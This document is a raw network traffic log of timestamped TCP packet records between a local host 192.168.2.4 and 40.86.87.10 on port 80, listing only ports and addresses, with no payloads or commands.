Jul 2, 2024 07:31:12.199220896 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.199232101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.199240923 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.199254990 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.199256897 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.199265957 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.199275017 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.199279070 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.199286938 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.199290037 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.199301004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.199311018 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.199321032 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.199321985 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.199332952 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.199340105 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.199343920 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.199354887 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.199364901 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.199367046 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.199376106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.199387074 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.199398041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.199398041 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.199405909 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.199408054 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.199440002 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.199451923 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.200191021 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.200201035 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.200212002 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.200221062 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.200232029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.200242996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.200242996 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.200253963 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.200259924 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.200268030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.200272083 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.200278997 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.200289011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.200294971 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.200299978 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.200310946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.200320005 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.200323105 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.200330973 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.200340986 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.200342894 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.200350046 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.200360060 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.200360060 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.200386047 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.200413942 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.201267004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.201278925 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.201287985 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.201299906 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.201309919 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.201318979 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.201323986 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.201328039 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.201338053 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.201343060 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.201348066 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.201358080 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.201368093 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.201370001 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.201376915 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.201386929 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.201386929 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.201396942 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.201406002 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.201410055 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.201417923 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.201427937 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.201436043 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.201438904 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.201447964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.201455116 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.201472998 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.201494932 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.202267885 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.202279091 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.202320099 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.300169945 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.301310062 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.316215038 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.316447020 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.316457033 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.316467047 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.316479921 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.316499949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.316510916 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.316587925 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.316620111 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.316631079 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.316636086 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.316660881 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.316672087 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.316675901 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.316706896 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.316792965 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.316803932 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.316812992 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.316838026 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.316849947 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.316993952 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.317004919 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.317014933 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.317025900 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.317035913 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.317043066 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.317045927 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.317058086 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.317068100 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.317074060 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.317079067 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.317087889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.317101955 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.317114115 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.317141056 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.317435026 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.317446947 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.317459106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.317470074 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.317482948 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.317490101 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.317513943 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.317531109 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.317702055 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.317713022 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.317723036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.317733049 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.317743063 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.317749977 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.317754984 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.317766905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.317775965 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.317775965 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.317789078 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.317816019 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.318145990 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318157911 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318167925 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318172932 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318185091 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318188906 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.318196058 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318207026 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.318207979 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318218946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318228960 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318231106 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.318242073 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.318274975 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.318826914 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318844080 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318854094 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318866014 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318877935 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318887949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318896055 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.318898916 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318909883 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318919897 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318921089 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.318928003 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.318932056 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318942070 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318949938 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.318953991 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318964005 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318974018 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318974972 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.318985939 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.318998098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.319000006 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.319009066 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.319016933 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.319020987 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.319041014 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.319066048 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.319663048 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.319674969 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.319685936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.319696903 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.319706917 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.319717884 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.319722891 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.319727898 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.319739103 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.319746017 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.319750071 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.319758892 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.319761038 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.319772005 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.319777966 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.319783926 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.319793940 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.319802999 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.319804907 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.319817066 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.319827080 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.319839954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.319845915 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.319845915 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.319845915 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.319856882 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.319873095 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.319900036 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.320703983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.320734978 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.320746899 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.320754051 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.320759058 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.320770025 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.320780039 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.320781946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.320794106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.320806026 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.320806980 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.320816994 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.320830107 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.320846081 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.320851088 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.320858002 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.320868969 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.320872068 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.320879936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.320892096 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.320898056 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.320904970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.320918083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.320928097 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.320933104 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.320945024 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.320945978 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.320955992 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.320970058 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.320998907 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.321451902 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.321479082 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.321499109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.321521044 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.321538925 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.435856104 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.435929060 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.435931921 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.435940027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.435976028 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.436032057 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.436043978 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.436055899 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.436085939 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.436106920 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.436175108 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.436184883 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.436194897 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.436203957 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.436214924 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.436224937 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.436244011 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.436414957 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.436444998 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.436459064 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.436470032 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.436485052 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.436501026 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.436511040 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.436527967 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.436533928 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.436563015 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.436757088 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.436768055 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.436778069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.436788082 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.436799049 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.436809063 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.436809063 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.436839104 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.436850071 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.437014103 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.437031031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.437041998 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.437076092 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.437146902 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.437159061 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.437170029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.437180042 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.437191010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.437200069 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.437202930 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.437211037 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.437213898 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.437225103 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.437232971 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.437236071 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.437257051 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.437274933 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.437901020 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.437911987 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.437922001 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.437932014 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.437942982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.437948942 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.437954903 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.437971115 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.437973022 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.437979937 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.437992096 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438003063 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438004017 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.438014030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438024998 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438026905 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.438036919 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438047886 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.438050032 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438062906 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438075066 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438076019 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.438086987 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438097954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438119888 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.438119888 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.438148975 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.438832998 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438844919 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438854933 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438867092 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438877106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.438884974 CEST	49730	80	192.168.2.4	40.86.87.10
